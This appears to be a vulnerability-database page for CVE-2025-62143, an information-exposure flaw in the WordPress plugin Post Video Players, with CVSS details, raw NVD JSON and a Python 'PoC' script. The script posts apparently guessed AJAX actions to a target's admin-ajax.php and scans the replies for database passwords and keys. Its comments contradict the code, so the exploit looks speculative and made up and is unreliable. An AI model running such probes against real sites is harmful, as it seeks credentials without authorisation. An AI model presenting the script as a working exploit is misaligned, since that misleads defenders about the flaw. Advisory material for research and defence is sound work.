Security Vulnerability Report
中文
CVE-2025-62143 CVSS 4.3 MEDIUM

CVE-2025-62143

Published: 2025-12-31 16:15:46
Last Modified: 2026-04-23 15:34:37

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in nicashmu Post Video Players video-playlist-and-gallery-plugin allows Retrieve Embedded Sensitive Data.This issue affects Post Video Players: from n/a through <= 1.163.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Post Video Players (video-playlist-and-gallery-plugin) <= 1.163

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62143 PoC - WordPress Post Video Players Sensitive Info Exposure # Target: WordPress site with Post Video Players plugin <= 1.163 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-62143 """ # Normalize URL if not target_url.startswith('http'): target_url = 'http://' + target_url if target_url.endswith('/'): target_url = target_url[:-1] # Try to access plugin endpoints that may expose sensitive information # Common WordPress AJAX endpoint ajax_endpoint = target_url + '/wp-admin/admin-ajax.php' # Try different actions that might expose data endpoints = [ {'action': 'get_video_playlist_data', 'params': {}}, {'action': 'video_playlist_gallery', 'params': {}}, {'action': 'get_playlist_config', 'params': {}}, {'action': 'pvag_get_data', 'params': {}} ] print(f"[*] Testing {target_url} for CVE-2025-62143") print(f"[*] Target AJAX endpoint: {ajax_endpoint}") vulnerable = False for endpoint in endpoints: try: # Send request with low-privilege user credentials (simulated) data = { 'action': endpoint['action'], **endpoint['params'] } # Request without authentication to test unauthorized access response = requests.post(ajax_endpoint, data=data, timeout=10) # Check for sensitive information in response sensitive_patterns = [ 'DB_HOST', 'DB_NAME', 'DB_USER', 'DB_PASSWORD', 'ABSPATH', 'WP_CONTENT_DIR', 'table_prefix', 'authentication keys', 'path', 'directory', 'config' ] response_text = response.text.lower() for pattern in sensitive_patterns: if pattern.lower() in response_text: print(f"[+] VULNERABLE! Found sensitive pattern: {pattern}") print(f"[+] Endpoint: {endpoint['action']}") print(f"[+] Response snippet: {response.text[:500]}...") vulnerable = True break except requests.exceptions.RequestException as e: print(f"[-] Error testing {endpoint['action']}: {e}") if not vulnerable: print("[-] No obvious vulnerability detected with basic tests") print("[*] Manual testing recommended: check plugin endpoints for auth bypass") return vulnerable if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2025-62143.py <target_url>") print("Example: python cve-2025-62143.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62143", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:46.153", "lastModified": "2026-04-23T15:34:37.313", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in nicashmu Post Video Players video-playlist-and-gallery-plugin allows Retrieve Embedded Sensitive Data.This issue affects Post Video Players: from n/a through <= 1.163."}, {"lang": "es", "value": "Vulnerabilidad de exposición de información sensible del sistema a una esfera de control no autorizada en los Reproductores de Video de Publicaciones de nicashmu permite Recuperar Datos Sensibles Incrustados. Este problema afecta a los Reproductores de Video de Publicaciones: desde n/a hasta 1.163."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/video-playlist-and-gallery-plugin/vulnerability/wordpress-post-video-players-plugin-1-163-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}